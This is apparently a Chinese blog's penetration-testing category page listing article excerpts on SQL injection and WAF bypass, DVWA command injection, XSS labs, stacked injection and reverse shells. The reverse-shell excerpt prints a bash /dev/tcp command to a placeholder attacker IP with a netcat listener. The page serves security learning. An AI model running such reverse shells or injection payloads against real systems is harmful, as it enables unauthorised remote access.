渗透测试
文章平均质量分 93
渗透测试学习
RuoLi_s
这个作者很懒,什么都没留下…
展开
-
数据库语法整理及WAF绕过方式
关系型数据库关系型数据库:指采用了关系模型来组织数据的数据库。直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDBOracleOracle特性:select id,contents,time from news where news_id=1 ① union ② sele原创 2021-09-30 10:37:32 · 2253 阅读 · 0 评论 -
干货|2020渗透测试面试问题大全 建议收藏
转自HACK之道 乌雲安全 渗透篇0.渗透测试知识体系结构1、介绍一下自认为有趣的挖洞经历挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等…2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案?SQL注入、密码组合,前者防护分为转载 2021-01-28 20:16:13 · 20063 阅读 · 1 评论 -
DVWA通关之命令注入(command injection)
DVWA通关之命令注入(command injection) 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14340551.html 难度等级:low过关思路我们先将其难度设置为low,看到其界面如下:通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1和www.baidu.com测试如下:127.0.0.1www.baidu.com可以看到,IP地址和域名都是能够ping通的,接下来就是使用命令拼原创 2021-01-28 16:35:16 · 585 阅读 · 0 评论 -
XSStrike工具的安装及使用
XSStrike是一款检测Cross Site Scripting的高级检测工具。它集成了payload生成器、爬虫和模糊引擎功能。原创 2021-01-26 20:30:04 · 7223 阅读 · 2 评论 -
xss-labs通关挑战(xss challenge)
XSS-labs通关挑战(xss challenge)0x00 xss-labs 最近在看xss,今天也就来做一下xss-labs通过挑战。找了好久的源码,终于被我给找到了,因为在GitHub上大家也知道那个下载速度,所以,我也就直接转接到自己的码云上去了,在这也贴出来,欢迎大家下载使用。 源码链接请点击:https://gitee.com/ruoli-s/xss-labs 安装没啥好说的,直接放进自己搭建好的www目录下,就可以开始闯关了,xss-labs一共有level 20,做着看吧。原创 2021-01-16 00:02:12 · 2004 阅读 · 0 评论 -
Stached injection -- 堆叠注入
Stached injection – 堆叠注入原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html0x00 堆叠注入的定义 Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。0x01 堆叠注入的原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql原创 2020-12-30 13:52:44 · 199 阅读 · 0 评论 -
web渗透常见shell反弹姿势
常见反弹shell总结:一、bash反弹通用① 在kali机里面开启端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用② 在目标主机上执行:bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号③ 解释bash -i: 打开一个交互的bash.>&: 标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port : 意为调原创 2020-11-28 16:44:39 · 747 阅读 · 0 评论